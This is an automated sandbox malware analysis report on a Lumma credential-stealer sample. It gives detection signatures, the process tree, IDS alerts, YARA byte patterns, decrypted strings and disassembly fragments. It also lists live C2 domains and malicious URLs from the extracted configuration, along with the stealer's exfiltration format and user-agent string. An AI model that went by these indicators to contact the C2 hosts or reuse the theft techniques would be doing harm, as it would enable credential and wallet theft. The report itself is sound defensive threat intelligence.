Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
IH5XqCdf06.exe

Overview

General Information

Sample name:IH5XqCdf06.exe
renamed because original name is a hash value
Original sample name:3bd2d12ed926118beb65b4cf48b49d5b.exe
Analysis ID:1584355
MD5:3bd2d12ed926118beb65b4cf48b49d5b
SHA1:fc96032acd8e41c011285de8962921fc1ec3f8fd
SHA256:d7d33c7a50fee99828789a17ae33a36d37c0c6f6038083bbde88d1857f4400b7
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • IH5XqCdf06.exe (PID: 3200 cmdline: "C:\Users\user\Desktop\IH5XqCdf06.exe" MD5: 3BD2D12ED926118BEB65B4CF48B49D5B)
    • 5734.tmp.exe (PID: 3544 cmdline: "C:\Users\user\AppData\Local\Temp\5734.tmp.exe" MD5: E7A39D1C95A0D6EDCDA94874D38987C2)
      • WerFault.exe (PID: 828 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3544 -s 1832 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["noisycuttej.shop", "cloudewahsj.shop", "framekgirus.shop", "tirepublicerj.shop", "wholersorie.shop", "abruptyopsn.shop", "nearycrepso.shop", "rabidcowse.shop"], "Build id": "4h5VfH--"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000003.00000002.2291465028.0000000002080000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000000.00000002.4569778024.0000000000600000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000003.00000002.2291502941.00000000020B0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
      • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
      00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
      • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
      00000003.00000002.2291082783.00000000004C3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Click to see the 4 entries
        No Sigma rule has matched
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-05T08:55:06.910759+010020283713Unknown Traffic192.168.2.649712104.21.96.1443TCP
        2025-01-05T08:55:07.885954+010020283713Unknown Traffic192.168.2.649713104.21.96.1443TCP
        2025-01-05T08:55:09.156393+010020283713Unknown Traffic192.168.2.649715104.21.96.1443TCP
        2025-01-05T08:55:10.266983+010020283713Unknown Traffic192.168.2.649721104.21.96.1443TCP
        2025-01-05T08:55:11.921604+010020283713Unknown Traffic192.168.2.649732104.21.96.1443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-05T08:55:07.396177+010020546531A Network Trojan was detected192.168.2.649712104.21.96.1443TCP
        2025-01-05T08:55:08.367233+010020546531A Network Trojan was detected192.168.2.649713104.21.96.1443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-05T08:55:07.396177+010020498361A Network Trojan was detected192.168.2.649712104.21.96.1443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-05T08:55:08.367233+010020498121A Network Trojan was detected192.168.2.649713104.21.96.1443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-05T08:55:06.910759+010020586071Domain Observed Used for C2 Detected192.168.2.649712104.21.96.1443TCP
        2025-01-05T08:55:07.885954+010020586071Domain Observed Used for C2 Detected192.168.2.649713104.21.96.1443TCP
        2025-01-05T08:55:09.156393+010020586071Domain Observed Used for C2 Detected192.168.2.649715104.21.96.1443TCP
        2025-01-05T08:55:10.266983+010020586071Domain Observed Used for C2 Detected192.168.2.649721104.21.96.1443TCP
        2025-01-05T08:55:11.921604+010020586071Domain Observed Used for C2 Detected192.168.2.649732104.21.96.1443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-05T08:55:06.404895+010020586061Domain Observed Used for C2 Detected192.168.2.6647541.1.1.153UDP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-05T08:55:10.783541+010020480941Malware Command and Control Activity Detected192.168.2.649721104.21.96.1443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-05T08:55:03.458660+010028032742Potentially Bad Traffic192.168.2.649709104.21.56.70443TCP
        2025-01-05T08:55:04.280937+010028032742Potentially Bad Traffic192.168.2.649710176.113.115.1980TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: IH5XqCdf06.exeAvira: detected
        Source: https://cloudewahsj.shop/7Avira URL Cloud: Label: malware
        Source: https://post-to-me.com/track_prt.php?sub=0&cc=DEwAvira URL Cloud: Label: malware
        Source: https://cloudewahsj.shop/apiAvira URL Cloud: Label: malware
        Source: https://cloudewahsj.shop/YAvira URL Cloud: Label: malware
        Source: https://cloudewahsj.shop/apiRAvira URL Cloud: Label: malware
        Source: https://cloudewahsj.shop/apie-Avira URL Cloud: Label: malware
        Source: https://cloudewahsj.shop/Avira URL Cloud: Label: malware
        Source: https://cloudewahsj.shop/GAvira URL Cloud: Label: malware
        Source: https://cloudewahsj.shop/apicAvira URL Cloud: Label: malware
        Source: https://cloudewahsj.shop/apiYAvira URL Cloud: Label: malware
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeAvira: detection malicious, Label: HEUR/AGEN.1306978
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\ScreenUpdateSync[1].exeAvira: detection malicious, Label: HEUR/AGEN.1306978
        Source: 3.2.5734.tmp.exe.400000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["noisycuttej.shop", "cloudewahsj.shop", "framekgirus.shop", "tirepublicerj.shop", "wholersorie.shop", "abruptyopsn.shop", "nearycrepso.shop", "rabidcowse.shop"], "Build id": "4h5VfH--"}
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\ScreenUpdateSync[1].exeReversingLabs: Detection: 52%
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeReversingLabs: Detection: 52%
        Source: IH5XqCdf06.exeVirustotal: Detection: 42%Perma Link
        Source: IH5XqCdf06.exeReversingLabs: Detection: 52%
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\ScreenUpdateSync[1].exeJoe Sandbox ML: detected
        Source: IH5XqCdf06.exeJoe Sandbox ML: detected
        Source: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: cloudewahsj.shop
        Source: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: rabidcowse.shop
        Source: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: noisycuttej.shop
        Source: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: tirepublicerj.shop
        Source: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: framekgirus.shop
        Source: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: wholersorie.shop
        Source: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: abruptyopsn.shop
        Source: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: nearycrepso.shop
        Source: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: cloudewahsj.shop
        Source: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: lid=%s&j=%s&ver=4.0
        Source: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: TeslaBrowser/5.5
        Source: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: - Screen Resoluton:
        Source: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: - Physical Installed Memory:
        Source: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: Workgroup: -
        Source: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: 4h5VfH--
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 3_2_00415D89 CryptUnprotectData,3_2_00415D89

        Compliance

        barindex
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeUnpacked PE file: 0.2.IH5XqCdf06.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeUnpacked PE file: 3.2.5734.tmp.exe.400000.0.unpack
        Source: IH5XqCdf06.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
        Source: unknownHTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.6:49709 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49712 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49713 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49715 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49721 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49732 version: TLS 1.2
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: number of queries: 1001
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_004389F2 FindFirstFileExW,0_2_004389F2
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_00678C59 FindFirstFileExW,0_2_00678C59
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+01h]3_2_00441816
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov eax, esi3_2_0043D0D0
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-533305EEh]3_2_0043D0D0
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+34h]3_2_0040C080
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00422370
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov word ptr [edx], cx3_2_00418BA2
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-1CAAACA4h]3_2_00417054
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+7E534795h]3_2_0041B021
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_0041B021
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then movzx ebp, byte ptr [esp+edi+02h]3_2_004438E0
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then movzx ebp, byte ptr [esp+edi+02h]3_2_004438F9
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then movzx ebp, byte ptr [esp+edi+02h]3_2_004438FB
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+482C66D0h]3_2_00422880
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then movzx ebx, bx3_2_00427885
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]3_2_0041F170
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov dword ptr [ebp-2Ch], eax3_2_004421E9
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov byte ptr [edi+10h], 00000000h3_2_004421E9
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [esi]3_2_0041618C
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then cmp word ptr [esi+eax+02h], 0000h3_2_0041BA52
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov esi, ecx3_2_0041BA52
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0041BA52
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov dword ptr [esi], FFFFFFFFh3_2_00402210
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_0043A230
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then movzx edx, word ptr [eax]3_2_004442E0
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_00431AF5
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ebx+0Bh]3_2_0040B280
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h3_2_00440A90
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+01h]3_2_00441B50
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov byte ptr [edi], bl3_2_00409360
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0042FB7D
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then movzx eax, byte ptr [ecx+edi]3_2_00408320
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h3_2_00419B30
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]3_2_0041F3E0
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov byte ptr [esi], al3_2_0041B3F2
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0041AB90
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then jmp ecx3_2_00428C62
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov ecx, eax3_2_00427C10
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 4B884A2Eh3_2_00444C20
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-000000D1h]3_2_00414C30
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov ecx, eax3_2_00418492
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then movzx edx, word ptr [ebx]3_2_0043CD40
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_0042C5E0
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov byte ptr [esi], al3_2_0041B58F
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h3_2_004195B6
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h3_2_004195B6
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov edi, edx3_2_0043E6E0
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then movzx eax, word ptr [edx]3_2_0043E6E0
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov ecx, edx3_2_00430F4E
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov ecx, edx3_2_00430F54
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov word ptr [ebx], ax3_2_0041A770
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov ecx, edx3_2_00430F03
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0042F716
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]3_2_00407730
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]3_2_00407730
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+7C605D08h]3_2_00427FC0
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-209D22B7h]3_2_00427FC0
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then movzx ebp, byte ptr [esp+edi+02h]3_2_004437D0
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+04h]3_2_0042A7F0
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov edx, ecx3_2_0042A7F0
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov ecx, eax3_2_00427FFD
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov edx, ecx3_2_0042AF92
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0042AF92
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov edx, ecx3_2_0042AFB0
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-000000D1h]3_2_020C5202
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov word ptr [edx], cx3_2_020C921E
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov word ptr [eax], cx3_2_020DB247
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov ecx, eax3_2_020D8264
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+7E534795h]3_2_020CB288
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_020CB288
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+7C605D08h]3_2_020D829E
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-1CAAACA4h]3_2_020C72BB
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+34h]3_2_020BC2E7
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov eax, esi3_2_020ED337
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-533305EEh]3_2_020ED337
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]3_2_020CF3D7
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov ecx, edx3_2_020E116A
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov ecx, edx3_2_020E11BB
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov ecx, edx3_2_020E11B5
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]3_2_020CF647
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov byte ptr [esi], al3_2_020CB659
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-209D22B7h]3_2_020D8677
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then cmp al, 20h3_2_020B275E
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov byte ptr [esi], al3_2_020CB7F6
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov dword ptr [ebp-2Ch], eax3_2_020F2450
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov byte ptr [edi+10h], 00000000h3_2_020F2450
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov dword ptr [esi], FFFFFFFFh3_2_020B2477
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_020EA497
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ebx+0Bh]3_2_020BB4E7
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov edi, dword ptr [esp+18h]3_2_020C5527
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then movzx edx, word ptr [eax]3_2_020F4547
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then movzx eax, byte ptr [ecx+edi]3_2_020B8587
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov byte ptr [edi], bl3_2_020B95C7
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov word ptr [eax], cx3_2_020D25D7
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov edi, edx3_2_020EEA3F
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+482C66D0h]3_2_020D2AE7
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then movzx ebx, bx3_2_020D7B02
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then movzx eax, word ptr [edx]3_2_020EEB27
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h3_2_020C981D
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h3_2_020C981D
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_020DC847
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov ecx, eax3_2_020C886C
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_020DF97D
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]3_2_020B7997
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]3_2_020B7997
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov word ptr [ebx], ax3_2_020CA9D7
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov ecx, eax3_2_020D7E77
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 4B884A2Eh3_2_020F4E87
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then jmp ecx3_2_020D8EB2
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov edx, ecx3_2_020DAF50
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then movzx edx, word ptr [ebx]3_2_020ECFA7
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+04h]3_2_020DAC89
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then cmp word ptr [esi+eax+02h], 0000h3_2_020CBCB9
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov esi, ecx3_2_020CBCB9
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_020CBCB9
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h3_2_020F0CF7
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_020DFDE4
